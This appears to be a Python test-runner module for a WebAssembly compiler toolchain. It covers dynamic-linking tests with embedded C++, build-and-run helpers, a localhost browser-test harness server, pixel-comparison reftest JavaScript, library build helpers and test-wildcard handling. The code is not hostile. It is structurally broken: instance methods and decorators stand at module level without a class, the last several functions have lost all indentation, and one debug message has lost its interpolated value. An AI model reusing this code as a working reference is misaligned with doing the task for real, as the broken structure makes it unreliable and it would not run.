# - because B and C are loaded in parallel.
def _test_dylink_dso_needed(self, do_run):
    """Drive the dylink DSO-needed scenario twice via `do_run`:
    once with RUNTIME_LINKED_LIBS (load at startup), once with dlopen().
    """
    create_test_file('liba.cpp', r'''
#include <stdio.h>
#include <emscripten.h>
static const char *afunc_prev;
extern "C" {
EMSCRIPTEN_KEEPALIVE void afunc(const char *s);
}
void afunc(const char *s) {
printf("a: %s (prev: %s)\n", s, afunc_prev);
afunc_prev = s;
}
struct ainit {
ainit() {
puts("a: loaded");
}
};
static ainit _;
''')
    create_test_file('libb.cpp', r'''
#include <emscripten.h>
extern "C" {
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void bfunc();
}
void bfunc() {
afunc("b");
}
''')
    create_test_file('libc.cpp', r'''
#include <emscripten.h>
extern "C" {
void afunc(const char *s);
EMSCRIPTEN_KEEPALIVE void cfunc();
}
void cfunc() {
afunc("c");
}
''')
    # _test_dylink_dso_needed can be potentially called several times by a test.
    # reset dylink-related options first.
    self.clear_setting('MAIN_MODULE')
    self.clear_setting('SIDE_MODULE')
    self.clear_setting('RUNTIME_LINKED_LIBS')
    # XXX in wasm each lib load currently takes 5MB; default INITIAL_MEMORY=16MB is thus not enough
    self.set_setting('INITIAL_MEMORY', 32 * 1024 * 1024)
    so = '.wasm' if self.is_wasm() else '.js'

    def ccshared(src, linkto=[]):
        # Build one side module, linked against the libraries in `linkto`.
        cmdv = [EMCC, src, '-o', shared.unsuffixed(src) + so] + self.get_emcc_args()
        cmdv += ['-s', 'SIDE_MODULE=1', '-s', 'RUNTIME_LINKED_LIBS=' + str(linkto)]
        self.run_process(cmdv)

    ccshared('liba.cpp')
    ccshared('libb.cpp', ['liba' + so])
    ccshared('libc.cpp', ['liba' + so])
    self.set_setting('MAIN_MODULE', 1)
    self.set_setting('RUNTIME_LINKED_LIBS', ['libb' + so, 'libc' + so])
    # Part 1: B and C linked at startup; A must load exactly once.
    do_run(r'''
extern "C" {
void bfunc();
void cfunc();
}
int test_main() {
bfunc();
cfunc();
return 0;
}
''',
           'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
    # Part 2: same scenario, but B and C are dlopen()ed at runtime.
    self.set_setting('RUNTIME_LINKED_LIBS', [])
    for libname in ['liba', 'libb', 'libc']:
        self.emcc_args += ['--embed-file', libname + so]
    do_run(r'''
#include <assert.h>
#include <dlfcn.h>
#include <stddef.h>
int test_main() {
void *bdso, *cdso;
void (*bfunc)(), (*cfunc)();
// FIXME for RTLD_LOCAL binding symbols to loaded lib is not currently working
bdso = dlopen("libb%(so)s", RTLD_GLOBAL);
assert(bdso != NULL);
cdso = dlopen("libc%(so)s", RTLD_GLOBAL);
assert(cdso != NULL);
bfunc = (void (*)())dlsym(bdso, "bfunc");
assert(bfunc != NULL);
cfunc = (void (*)())dlsym(cdso, "cfunc");
assert(cfunc != NULL);
bfunc();
cfunc();
return 0;
}
''' % locals(),
           'a: loaded\na: b (prev: (null))\na: c (prev: b)\n')
def filtered_js_engines(self, js_engines=None):
    """Return `js_engines` (default: shared.JS_ENGINES) minus banned engines."""
    if js_engines is None:
        js_engines = shared.JS_ENGINES
    for engine in js_engines:
        assert type(engine) == list
    for engine in self.banned_js_engines:
        assert type(engine) in (list, type(None))
    # An engine is identified by its first element (the binary).
    banned_binaries = {b[0] for b in self.banned_js_engines if b}
    return [e for e in js_engines if e and e[0] not in banned_binaries]
def do_run(self, src, expected_output, force_c=False, **kwargs):
    """Write source text to a file (unless no_build is passed) and build+run it."""
    if 'no_build' in kwargs:
        # `src` is already a path to a prebuilt artifact.
        filename = src
    else:
        filename = 'src.c' if force_c else 'src.cpp'
        with open(filename, 'w') as f:
            f.write(src)
    self._build_and_run(filename, expected_output, **kwargs)
def do_runf(self, filename, expected_output=None, **kwargs):
    """Build and run an existing source file (no source text is written)."""
    self._build_and_run(filename, expected_output, **kwargs)
## Just like `do_run` but with filename of expected output
def do_run_from_file(self, filename, expected_output_filename, **kwargs):
    """Build+run `filename`, expecting the contents of `expected_output_filename`.

    Fix over the original: the expected-output file is read via a context
    manager so its handle is closed promptly instead of leaking until GC.
    """
    with open(expected_output_filename) as f:
        expected = f.read()
    self._build_and_run(filename, expected, **kwargs)
def do_run_in_out_file_test(self, *path, **kwargs):
    """Build+run tests/<path> and compare against the sibling '.out' file.

    Fix over the original: the '.out' file is read via a context manager so
    the handle is closed promptly instead of leaking until GC.
    """
    srcfile = path_from_root(*path)
    outfile = shared.unsuffixed(srcfile) + '.out'
    with open(outfile) as f:
        expected = f.read()
    self._build_and_run(srcfile, expected, **kwargs)
## Does a complete test - builds, runs, checks output, etc.
def _build_and_run(self, filename, expected_output, args=[], output_nicerizer=None,
                   no_build=False,
                   js_engines=None, post_build=None, libraries=[],
                   includes=[],
                   assert_returncode=0, assert_identical=False, assert_all=False,
                   check_for_error=True, force_c=False):
    """Build `filename` (unless no_build) and run it on each selected engine,
    checking the output against `expected_output`.

    assert_identical: require exact equality instead of containment.
    assert_all: `expected_output` is a list, each element must be contained.
    """
    # NOTE(review): this debug message interpolates nothing — it looks like
    # the filename was lost from the f-string; confirm against upstream.
    logger.debug(f'_build_and_run: (unknown)')
    if no_build:
        js_file = filename
    else:
        self.build(filename, libraries=libraries, includes=includes, post_build=post_build,
                   force_c=force_c)
        js_file = shared.unsuffixed(os.path.basename(filename)) + '.js'
    self.assertExists(js_file)
    engines = self.filtered_js_engines(js_engines)
    # Unless the test opts into use_all_engines, one engine is enough.
    if len(engines) > 1 and not self.use_all_engines:
        engines = engines[:1]
    # In standalone mode, also add wasm vms as we should be able to run there too.
    if self.get_setting('STANDALONE_WASM'):
        # TODO once standalone wasm support is more stable, apply use_all_engines
        # like with js engines, but for now as we bring it up, test in all of them
        wasm_engines = shared.WASM_ENGINES
        if len(wasm_engines) == 0:
            logger.warning('no wasm engine was found to run the standalone part of this test')
        engines += wasm_engines
    if self.get_setting('WASM2C') and not EMTEST_LACKS_NATIVE_CLANG:
        # compile the c file to a native executable.
        c = shared.unsuffixed(js_file) + '.wasm.c'
        executable = shared.unsuffixed(js_file) + '.exe'
        cmd = [shared.CLANG_CC, c, '-o', executable] + clang_native.get_clang_native_args()
        self.run_process(cmd, env=clang_native.get_clang_native_env())
        # we can now run the executable directly, without an engine, which
        # we indicate with None as the engine
        engines += [[None]]
    if len(engines) == 0:
        self.skipTest('No JS engine present to run this test with. Check %s and the paths therein.' % EM_CONFIG)
    for engine in engines:
        js_output = self.run_js(js_file, engine, args, output_nicerizer=output_nicerizer, assert_returncode=assert_returncode)
        js_output = js_output.replace('\r\n', '\n')
        if expected_output:
            try:
                if assert_identical:
                    self.assertIdentical(expected_output, js_output)
                elif assert_all:
                    for o in expected_output:
                        self.assertContained(o, js_output)
                else:
                    self.assertContained(expected_output, js_output)
                if check_for_error:
                    self.assertNotContained('ERROR', js_output)
            except Exception:
                # Name the engine so a multi-engine run points at the culprit.
                print('(test did not pass in JS engine: %s)' % engine)
                raise
def get_freetype_library(self):
    """Build (or fetch cached) freetype; -Werror is dropped first since the
    freetype build produces warnings."""
    try:
        self.emcc_args.remove('-Werror')
    except ValueError:
        pass  # -Werror was not set
    return self.get_library(os.path.join('third_party', 'freetype'), os.path.join('objs', '.libs', 'libfreetype.a'), configure_args=['--disable-shared', '--without-zlib'])
def get_poppler_library(self, env_init=None):
    """Build poppler plus its freetype dependency; return the combined lib list."""
    # The fontconfig symbols are all missing from the poppler build
    # e.g. FcConfigSubstitute
    self.set_setting('ERROR_ON_UNDEFINED_SYMBOLS', 0)
    self.emcc_args += [
        '-I' + path_from_root('tests', 'third_party', 'freetype', 'include'),
        '-I' + path_from_root('tests', 'third_party', 'poppler', 'include')
    ]
    freetype = self.get_freetype_library()
    # Poppler has some pretty glaring warning. Suppress them to keep the
    # test output readable.
    if '-Werror' in self.emcc_args:
        self.emcc_args.remove('-Werror')
    self.emcc_args += [
        '-Wno-sentinel',
        '-Wno-logical-not-parentheses',
        '-Wno-unused-private-field',
        '-Wno-tautological-compare',
        '-Wno-unknown-pragmas',
    ]
    env = dict(env_init) if env_init else {}
    env['FONTCONFIG_CFLAGS'] = ' '
    env['FONTCONFIG_LIBS'] = ' '
    poppler = self.get_library(
        os.path.join('third_party', 'poppler'),
        [os.path.join('utils', 'pdftoppm.o'), os.path.join('utils', 'parseargs.o'), os.path.join('poppler', '.libs', 'libpoppler.a')],
        env_init=env,
        configure_args=['--disable-libjpeg', '--disable-libpng', '--disable-poppler-qt', '--disable-poppler-qt4', '--disable-cms', '--disable-cairo-output', '--disable-abiword-output', '--disable-shared'])
    return poppler + freetype
def get_zlib_library(self):
    """Build zlib; on Windows it is configured via emconfigure.bat + cmake
    and built with mingw32-make."""
    zlib_dir = os.path.join('third_party', 'zlib')
    target = os.path.join('libz.a')
    if not WINDOWS:
        return self.get_library(zlib_dir, target, make_args=['libz.a'])
    return self.get_library(zlib_dir, target,
                            configure=[path_from_root('emconfigure.bat')],
                            configure_args=['cmake', '.'],
                            make=['mingw32-make'],
                            make_args=[])
# Run a server and a web page. When a test runs, we tell the server about it,
# which tells the web page, which then opens a window with the test. Doing
# it this way then allows the page to close() itself when done.
def harness_server_func(in_queue, out_queue, port):
    """Serve the browser-test harness on localhost:`port`.

    Receives (url, dir) pairs on `in_queue`, serves them to the polling
    harness page via '/check', and forwards the result path the page
    reports back on `out_queue`. Runs forever; the test runner terminates
    this process.
    """
    class TestServerHandler(SimpleHTTPRequestHandler):
        # Request header handler for default do_GET() path in
        # SimpleHTTPRequestHandler.do_GET(self) below.
        def send_head(self):
            # Serve .js ourselves to force the correct JS MIME type.
            if self.path.endswith('.js'):
                path = self.translate_path(self.path)
                try:
                    f = open(path, 'rb')
                except IOError:
                    self.send_error(404, "File not found: " + path)
                    return None
                self.send_response(200)
                self.send_header('Content-type', 'application/javascript')
                self.send_header('Connection', 'close')
                self.end_headers()
                return f
            else:
                return SimpleHTTPRequestHandler.send_head(self)

        # Add COOP, COEP, CORP, and no-caching headers
        def end_headers(self):
            self.send_header('Access-Control-Allow-Origin', '*')
            self.send_header('Cross-Origin-Opener-Policy', 'same-origin')
            self.send_header('Cross-Origin-Embedder-Policy', 'require-corp')
            self.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
            self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
            return SimpleHTTPRequestHandler.end_headers(self)

        def do_GET(self):
            if self.path == '/run_harness':
                # Initial load: hand back the harness page itself.
                if DEBUG:
                    print('[server startup]')
                self.send_response(200)
                self.send_header('Content-type', 'text/html')
                self.end_headers()
                self.wfile.write(open(path_from_root('tests', 'browser_harness.html'), 'rb').read())
            elif 'report_' in self.path:
                # the test is reporting its result. first change dir away from the
                # test dir, as it will be deleted now that the test is finishing, and
                # if we got a ping at that time, we'd return an error
                os.chdir(path_from_root())
                # for debugging, tests may encode the result and their own url (window.location) as result|url
                if '|' in self.path:
                    path, url = self.path.split('|', 1)
                else:
                    path = self.path
                    url = '?'
                if DEBUG:
                    print('[server response:', path, url, ']')
                if out_queue.empty():
                    out_queue.put(path)
                else:
                    # a badly-behaving test may send multiple xhrs with reported results; we just care
                    # about the first (if we queued the others, they might be read as responses for
                    # later tests, or maybe the test sends more than one in a racy manner).
                    # we place 'None' in the queue here so that the outside knows something went wrong
                    # (none is not a valid value otherwise; and we need the outside to know because if we
                    # raise an error in here, it is just swallowed in python's webserver code - we want
                    # the test to actually fail, which a webserver response can't do).
                    out_queue.put(None)
                    raise Exception('browser harness error, excessive response to server - test must be fixed! "%s"' % self.path)
                self.send_response(200)
                self.send_header('Content-type', 'text/plain')
                self.send_header('Cache-Control', 'no-cache, must-revalidate')
                self.send_header('Connection', 'close')
                self.send_header('Expires', '-1')
                self.end_headers()
                self.wfile.write(b'OK')
            elif 'stdout=' in self.path or 'stderr=' in self.path or 'exception=' in self.path:
                '''
                To get logging to the console from browser tests, add this to
                print/printErr/the exception handler in src/shell.html:
                var xhr = new XMLHttpRequest();
                xhr.open('GET', encodeURI('http://localhost:8888?stdout=' + text));
                xhr.send();
                '''
                print('[client logging:', unquote_plus(self.path), ']')
                self.send_response(200)
                self.send_header('Content-type', 'text/html')
                self.end_headers()
            elif self.path == '/check':
                # The harness page polls here for the next test to run.
                self.send_response(200)
                self.send_header('Content-type', 'text/html')
                self.end_headers()
                if not in_queue.empty():
                    # there is a new test ready to be served
                    url, dir = in_queue.get()
                    if DEBUG:
                        print('[queue command:', url, dir, ']')
                    assert in_queue.empty(), 'should not be any blockage - one test runs at a time'
                    assert out_queue.empty(), 'the single response from the last test was read'
                    # tell the browser to load the test
                    self.wfile.write(b'COMMAND:' + url)
                    # move us to the right place to serve the files for the new test
                    os.chdir(dir)
                else:
                    # the browser must keep polling
                    self.wfile.write(b'(wait)')
            else:
                # Use SimpleHTTPServer default file serving operation for GET.
                if DEBUG:
                    print('[simple HTTP serving:', unquote_plus(self.path), ']')
                SimpleHTTPRequestHandler.do_GET(self)

        # NOTE(review): defined without `self`; when called as a bound method
        # the instance lands in `code`. Harmless since everything is ignored.
        def log_request(code=0, size=0):
            # don't log; too noisy
            pass

    # allows streaming compilation to work
    SimpleHTTPRequestHandler.extensions_map['.wasm'] = 'application/wasm'
    httpd = HTTPServer(('localhost', port), TestServerHandler)
    httpd.serve_forever()  # test runner will kill us
class BrowserCore(RunnerCore):
    """Base class for tests that run in a real browser via the harness server."""
    # note how many tests hang / do not send an output. if many of these
    # happen, likely something is broken and it is best to abort the test
    # suite early, as otherwise we will wait for the timeout on every
    # single test (hundreds of minutes)
    MAX_UNRESPONSIVE_TESTS = 10
    # Running count of tests that never reported a result; class-level so it
    # accumulates across tests.
    unresponsive_tests = 0

    def __init__(self, *args, **kwargs):
        super(BrowserCore, self).__init__(*args, **kwargs)
@staticmethod
def browser_open(url):
    """Open `url` in the browser named by EMTEST_BROWSER, falling back to the
    system default browser when EMTEST_BROWSER is unset."""
    if not EMTEST_BROWSER:
        logger.info('Using default system browser')
        webbrowser.open_new(url)
        return
    browser_args = shlex.split(EMTEST_BROWSER)
    # If the given browser is a scalar, treat it like one of the possible types
    # from https://docs.python.org/2/library/webbrowser.html
    if len(browser_args) == 1:
        try:
            # This throws if the type of browser isn't available
            webbrowser.get(browser_args[0]).open_new(url)
            logger.info('Using Emscripten browser: %s', browser_args[0])
            return
        except webbrowser.Error:
            pass  # fall back to the custom-command logic below
    # Else assume the given browser is a specific program with additional
    # parameters and delegate to that
    logger.info('Using Emscripten browser: %s', str(browser_args))
    subprocess.Popen(browser_args + [url])
@classmethod
def setUpClass(cls):
    """Start the shared harness server process and open the browser once for
    the whole test class."""
    super(BrowserCore, cls).setUpClass()
    cls.also_asmjs = int(os.getenv('EMTEST_BROWSER_ALSO_ASMJS', '0')) == 1
    cls.port = int(os.getenv('EMTEST_BROWSER_PORT', '8888'))
    if not has_browser():
        return
    # Seconds to wait for a page to report a result before declaring the
    # test unresponsive (see run_browser).
    cls.browser_timeout = 60
    cls.harness_in_queue = multiprocessing.Queue()
    cls.harness_out_queue = multiprocessing.Queue()
    cls.harness_server = multiprocessing.Process(target=harness_server_func, args=(cls.harness_in_queue, cls.harness_out_queue, cls.port))
    cls.harness_server.start()
    print('[Browser harness server on process %d]' % cls.harness_server.pid)
    cls.browser_open('http://localhost:%s/run_harness' % cls.port)
@classmethod
def tearDownClass(cls):
    """Terminate the harness server started in setUpClass."""
    super(BrowserCore, cls).tearDownClass()
    if not has_browser():
        return
    cls.harness_server.terminate()
    print('[Browser harness server terminated]')
    if WINDOWS:
        # On Windows, shutil.rmtree() in tearDown() raises this exception if we do not wait a bit:
        # WindowsError: [Error 32] The process cannot access the file because it is being used by another process.
        time.sleep(0.1)
def assert_out_queue_empty(self, who):
    """Raise if the harness result queue has leftover responses, draining it
    first so the next test starts clean."""
    if self.harness_out_queue.empty():
        return
    while not self.harness_out_queue.empty():
        self.harness_out_queue.get()
    raise Exception('excessive responses from %s' % who)
# @param extra_tries: how many more times to try this test, if it fails. browser tests have
# many more causes of flakiness (in particular, they do not run
# synchronously, so we have a timeout, which can be hit if the VM
# we run on stalls temporarily), so we let each test try more than
# once by default
def run_browser(self, html_file, message, expectedResult=None, timeout=None, extra_tries=1):
    """Queue `html_file` for the harness browser and verify the reported result.

    With expectedResult=None the page is merely opened for manual inspection
    and `message` tells the human what to look for.
    """
    if not has_browser():
        return
    if BrowserCore.unresponsive_tests >= BrowserCore.MAX_UNRESPONSIVE_TESTS:
        self.skipTest('too many unresponsive tests, skipping browser launch - check your setup!')
    self.assert_out_queue_empty('previous test')
    if DEBUG:
        print('[browser launch:', html_file, ']')
    if expectedResult is not None:
        try:
            self.harness_in_queue.put((
                asbytes('http://localhost:%s/%s' % (self.port, html_file)),
                self.get_dir()
            ))
            received_output = False
            output = '[no http server activity]'
            start = time.time()
            if timeout is None:
                timeout = self.browser_timeout
            # Poll the result queue until the page reports or we time out.
            while time.time() - start < timeout:
                if not self.harness_out_queue.empty():
                    output = self.harness_out_queue.get()
                    received_output = True
                    break
                time.sleep(0.1)
            if not received_output:
                BrowserCore.unresponsive_tests += 1
                print('[unresponsive tests: %d]' % BrowserCore.unresponsive_tests)
            if output is None:
                # the browser harness reported an error already, and sent a None to tell
                # us to also fail the test
                raise Exception('failing test due to browser harness error')
            if output.startswith('/report_result?skipped:'):
                self.skipTest(unquote(output[len('/report_result?skipped:'):]).strip())
            else:
                # verify the result, and try again if we should do so
                try:
                    self.assertIdenticalUrlEncoded(expectedResult, output)
                except Exception as e:
                    if extra_tries > 0:
                        print('[test error (see below), automatically retrying]')
                        print(e)
                        # Recurse with one fewer retry budget.
                        return self.run_browser(html_file, message, expectedResult, timeout, extra_tries - 1)
                    else:
                        raise e
        finally:
            time.sleep(0.1)  # see comment about Windows above
            self.assert_out_queue_empty('this test')
    else:
        # Manual mode: just open the page and let the human verify.
        webbrowser.open_new(os.path.abspath(html_file))
        print('A web browser window should have opened a page containing the results of a part of this test.')
        print('You need to manually look at the page to see that it works ok: ' + message)
        print('(sleeping for a bit to keep the directory alive for the web browser..)')
        time.sleep(5)
        print('(moving on..)')
def with_report_result(self, user_code):
    """Prepend the REPORT_RESULT header and implementation to test source so
    the page can report its result back to the harness server."""
    report_header = path_from_root('tests', 'report_result.h')
    # NOTE(review): this handle is left for GC to close; harmless in tests.
    report_main = open(path_from_root('tests', 'report_result.cpp')).read()
    return f'''
#define EMTEST_PORT_NUMBER {self.port}
#include "{report_header}"
{report_main}
{user_code}
'''
# @manually_trigger If set, we do not assume we should run the reftest when main() is done.
# Instead, call doReftest() in JS yourself at the right time.
def reftest(self, expected, manually_trigger=False):
    """Write reftest.js, which compares the page canvas pixel-by-pixel against
    the `expected` image and reports the mean per-channel difference to the
    harness server."""
    # make sure the pngs used here have no color correction, using e.g.
    # pngcrush -rem gAMA -rem cHRM -rem iCCP -rem sRGB infile outfile
    basename = os.path.basename(expected)
    shutil.copyfile(expected, os.path.join(self.get_dir(), basename))
    with open(os.path.join(self.get_dir(), 'reftest.js'), 'w') as out:
        with open(path_from_root('tests', 'browser_reporting.js')) as reporting:
            # The three %s slots are: the reporting JS, the reference image
            # basename, and 0/1 for manually_trigger.
            out.write('''
function doReftest() {
if (doReftest.done) return;
doReftest.done = true;
var img = new Image();
img.onload = function() {
assert(img.width == Module.canvas.width, 'Invalid width: ' + Module.canvas.width + ', should be ' + img.width);
assert(img.height == Module.canvas.height, 'Invalid height: ' + Module.canvas.height + ', should be ' + img.height);
var canvas = document.createElement('canvas');
canvas.width = img.width;
canvas.height = img.height;
var ctx = canvas.getContext('2d');
ctx.drawImage(img, 0, 0);
var expected = ctx.getImageData(0, 0, img.width, img.height).data;
var actualUrl = Module.canvas.toDataURL();
var actualImage = new Image();
actualImage.onload = function() {
/*
document.body.appendChild(img); // for comparisons
var div = document.createElement('div');
div.innerHTML = '^=expected, v=actual';
document.body.appendChild(div);
document.body.appendChild(actualImage); // to grab it for creating the test reference
*/
var actualCanvas = document.createElement('canvas');
actualCanvas.width = actualImage.width;
actualCanvas.height = actualImage.height;
var actualCtx = actualCanvas.getContext('2d');
actualCtx.drawImage(actualImage, 0, 0);
var actual = actualCtx.getImageData(0, 0, actualImage.width, actualImage.height).data;
var total = 0;
var width = img.width;
var height = img.height;
for (var x = 0; x < width; x++) {
for (var y = 0; y < height; y++) {
total += Math.abs(expected[y*width*4 + x*4 + 0] - actual[y*width*4 + x*4 + 0]);
total += Math.abs(expected[y*width*4 + x*4 + 1] - actual[y*width*4 + x*4 + 1]);
total += Math.abs(expected[y*width*4 + x*4 + 2] - actual[y*width*4 + x*4 + 2]);
}
}
var wrong = Math.floor(total / (img.width*img.height*3)); // floor, to allow some margin of error for antialiasing
// If the main JS file is in a worker, or modularize, then we need to supply our own reporting logic.
if (typeof reportResultToServer === 'undefined') {
(function() {
%s
reportResultToServer(wrong);
})();
} else {
reportResultToServer(wrong);
}
};
actualImage.src = actualUrl;
}
img.src = '%s';
};
// Automatically trigger the reftest?
if (!%s) {
// Yes, automatically
Module['postRun'] = doReftest;
if (typeof WebGLClient !== 'undefined') {
// trigger reftest from RAF as well, needed for workers where there is no pre|postRun on the main thread
var realRAF = window.requestAnimationFrame;
window.requestAnimationFrame = /** @suppress{checkTypes} */ (function(func) {
realRAF(function() {
func();
realRAF(doReftest);
});
});
// trigger reftest from canvas render too, for workers not doing GL
var realWOM = worker.onmessage;
worker.onmessage = function(event) {
realWOM(event);
if (event.data.target === 'canvas' && event.data.op === 'render') {
realRAF(doReftest);
}
};
}
} else {
// Manually trigger the reftest.
// The user will call it.
// Add an event loop iteration to ensure rendering, so users don't need to bother.
var realDoReftest = doReftest;
doReftest = function() {
setTimeout(realDoReftest, 1);
};
}
''' % (reporting.read(), basename, int(manually_trigger)))
def compile_btest(self, args):
    """Compile a browser test, always injecting the shared reporting pre-js."""
    reporting_js = path_from_root('tests', 'browser_reporting.js')
    self.run_process([EMCC] + args + ['--pre-js', reporting_js])
def btest(self, filename, expected=None, reference=None, force_c=False,
          reference_slack=0, manual_reference=False, post_build=None,
          args=None, outfile='test.html', message='.', also_proxied=False,
          url_suffix='', timeout=None, also_asmjs=False,
          manually_trigger_reftest=False, extra_tries=1):
    """Compile and run one browser test.

    `filename` is either a path under tests/ or raw source (detected by an
    embedded newline). `expected` is the report_result value(s) to accept;
    `reference` is a reference image for pixel comparison (with up to
    `reference_slack` wrong pixels tolerated). Optionally re-runs the test
    under WASM=0 (`also_asmjs`) and/or proxied to a worker (`also_proxied`).
    """
    # Bug fix: `args` used to default to a shared mutable list ([]); any
    # caller mutating it leaked extra flags into every later btest() call.
    if args is None:
        args = []
    assert expected or reference, 'a btest must either expect an output, or have a reference image'
    # if we are provided the source and not a path, use that
    filename_is_src = '\n' in filename
    src = filename if filename_is_src else ''
    original_args = args[:]
    # add in support for reporting results. this adds as an include a header so testcases can
    # use REPORT_RESULT, and also adds a cpp file to be compiled alongside the testcase, which
    # contains the implementation of REPORT_RESULT (we can't just include that implementation in
    # the header as there may be multiple files being compiled here).
    args = args + ['-DEMTEST_PORT_NUMBER=%d' % self.port,
                   '-include', path_from_root('tests', 'report_result.h'),
                   path_from_root('tests', 'report_result.cpp')]
    if filename_is_src:
        filepath = os.path.join(self.get_dir(), 'main.c' if force_c else 'main.cpp')
        with open(filepath, 'w') as f:
            f.write(src)
    else:
        filepath = path_from_root('tests', filename)
    if reference:
        self.reference = reference
        # a reference image implies success is "N wrong pixels" for N up to the slack
        expected = [str(i) for i in range(0, reference_slack + 1)]
        self.reftest(path_from_root('tests', reference), manually_trigger=manually_trigger_reftest)
        if not manual_reference:
            args += ['--pre-js', 'reftest.js', '-s', 'GL_TESTING=1']
    all_args = ['-s', 'IN_TEST_HARNESS=1', filepath, '-o', outfile] + args
    try_delete(outfile)
    self.compile_btest(all_args)
    self.assertExists(outfile)
    if post_build:
        post_build()
    if not isinstance(expected, list):
        expected = [expected]
    self.run_browser(outfile + url_suffix, message, ['/report_result?' + e for e in expected], timeout=timeout, extra_tries=extra_tries)
    # Tests can opt into being run under asmjs as well
    if 'WASM=0' not in args and (also_asmjs or self.also_asmjs):
        print('WASM=0')
        self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
                   original_args + ['-s', 'WASM=0'], outfile, message, also_proxied=False, timeout=timeout)
    if also_proxied:
        print('proxied...')
        if reference:
            assert not manual_reference
            manual_reference = True
            assert not post_build
            post_build = self.post_manual_reftest
        # run proxied
        self.btest(filename, expected, reference, force_c, reference_slack, manual_reference, post_build,
                   original_args + ['--proxy-to-worker', '-s', 'GL_TESTING=1'], outfile, message, timeout=timeout)
###################################################################################################
def build_library(name,
                  build_dir,
                  output_dir,
                  generated_libs,
                  configure=['sh', './configure'],
                  configure_args=None,
                  make=['make'],
                  make_args=None,
                  cache=None,
                  cache_name=None,
                  env_init=None,
                  native=False,
                  cflags=[]):
    """Build a library and cache the result. We build the library file
    once and cache it for all our tests. (We cache in memory since the test
    directory is destroyed and recreated for each test. Note that we cache
    separately for different compilers). This cache is just during the test
    runner. There is a different concept of caching as well, see |Cache|.
    """
    # Bug fix: configure_args / make_args / env_init used to default to
    # shared mutable objects. `make_args += ['VERBOSE=1']` below then
    # appended to the module-level default on EVERY verbose call, so the
    # flag accumulated across invocations. Use None sentinels and per-call
    # copies instead. (`configure` keeps its list default: callers pass
    # configure=None deliberately to skip the configure step.)
    configure_args = list(configure_args) if configure_args else []
    make_args = list(make_args) if make_args else []
    env_init = dict(env_init) if env_init else {}
    if type(generated_libs) is not list:
        generated_libs = [generated_libs]
    source_dir = path_from_root('tests', name.replace('_native', ''))
    temp_dir = build_dir
    project_dir = os.path.join(temp_dir, name)
    if os.path.exists(project_dir):
        shutil.rmtree(project_dir)
    # Useful in debugging sometimes to comment this out, and two lines above
    shutil.copytree(source_dir, project_dir)
    generated_libs = [os.path.join(project_dir, lib) for lib in generated_libs]
    if native:
        env = clang_native.get_clang_native_env()
    else:
        env = building.get_building_env(cflags=cflags)
    for k, v in env_init.items():
        env[k] = v
    if configure:
        try:
            with open(os.path.join(project_dir, 'configure_out'), 'w') as out:
                with open(os.path.join(project_dir, 'configure_err'), 'w') as err:
                    stdout = out if EM_BUILD_VERBOSE < 2 else None
                    stderr = err if EM_BUILD_VERBOSE < 1 else None
                    building.configure(configure + configure_args, env=env,
                                       stdout=stdout,
                                       stderr=stderr,
                                       cwd=project_dir)
        except subprocess.CalledProcessError:
            # dump captured configure output to help diagnose the failure
            with open(os.path.join(project_dir, 'configure_out')) as f:
                print('-- configure stdout --')
                print(f.read())
                print('-- end configure stdout --')
            with open(os.path.join(project_dir, 'configure_err')) as f:
                print('-- configure stderr --')
                print(f.read())
                print('-- end configure stderr --')
            raise

    def open_make_out(mode='r'):
        return open(os.path.join(project_dir, 'make.out'), mode)

    def open_make_err(mode='r'):
        return open(os.path.join(project_dir, 'make.err'), mode)

    if EM_BUILD_VERBOSE >= 3:
        # Safe now: make_args is a per-call copy, not the shared default.
        make_args += ['VERBOSE=1']
    try:
        with open_make_out('w') as make_out:
            with open_make_err('w') as make_err:
                stdout = make_out if EM_BUILD_VERBOSE < 2 else None
                stderr = make_err if EM_BUILD_VERBOSE < 1 else None
                building.make(make + make_args, stdout=stdout, stderr=stderr, env=env,
                              cwd=project_dir)
    except subprocess.CalledProcessError:
        with open_make_out() as f:
            print('-- make stdout --')
            print(f.read())
            print('-- end make stdout --')
        with open_make_err() as f:
            print('-- make stderr --')
            print(f.read())
            print('-- end stderr --')
        raise
    if cache is not None:
        cache[cache_name] = []
        for f in generated_libs:
            basename = os.path.basename(f)
            # Bug fix: close the library file instead of leaking the handle.
            with open(f, 'rb') as lib:
                cache[cache_name].append((basename, lib.read()))
    return generated_libs
def check_js_engines():
    """Verify every configured JS engine works; abort the runner otherwise."""
    working_engines = list(filter(jsrun.check_engine, shared.JS_ENGINES))
    if len(working_engines) < len(shared.JS_ENGINES):
        # Fixed grammar of the message and replaced the site-module `exit`
        # builtin with sys.exit, which is always available.
        print('Not all the JS engines in JS_ENGINES appear to work.')
        sys.exit(1)
    if EMTEST_ALL_ENGINES:
        print('(using ALL js engines)')
    else:
        logger.warning('use EMTEST_ALL_ENGINES=1 in the env to run against all JS '
                       'engines, which is slower but provides more coverage')
def get_and_import_modules():
    """Import every test*.py file next to this script and return the modules."""
    pattern = os.path.join(os.path.dirname(__file__), 'test*.py')
    modules = []
    for filename in glob.glob(pattern):
        module_name = os.path.splitext(os.path.basename(filename))[0]
        __import__(module_name)
        modules.append(sys.modules[module_name])
    return modules
def get_all_tests(modules):
# Create a list of all known tests so that we can choose from them based on a wildcard search
all_tests = []
suites = core_test_modes + non_core_test_modes
for m in modules:
for s in suites:
if hasattr(m, s):
tests = [t for t in dir(getattr(m, s)) if t.startswith('test_')]
all_tests += [s + '.' + t for t in tests]
return all_tests
def tests_with_expanded_wildcards(args, all_tests):
# Process wildcards, e.g. "browser.test_pthread_*" should expand to list all pthread tests
new_args = []
for i, arg in enumerate(args):
if '*' in arg:
if arg.startswith('skip:'):
arg = arg[5:]
matching_tests = fnmatch.filter(all_tests, arg)
new_args += ['skip:' + t for t in matching_tests]
else:
new_args += fnmatch.filter(all_tests, arg)
else:
new_args += [arg]
if not new_args and args:
print('No tests found to run in set: ' + str(args))
sys.exit(1)
return new_args
def skip_requested_tests(args, modules):
for i, arg in enumerate(args):
if arg.startswith('skip:'):
which = [arg.split('skip:')[1]]
print(','.join(which), file=sys.stderr)
skipped = False
for test in which:
print('will skip "%s"' % test, file=sys.stderr)
suite_name, test_name = test.split('.')
for m in modules:
suite = getattr(m, suite_name, None)
if suite:
setattr(suite, test_name, lambda s: s.skipTest("requested to be skipped"))
skipped = True
break
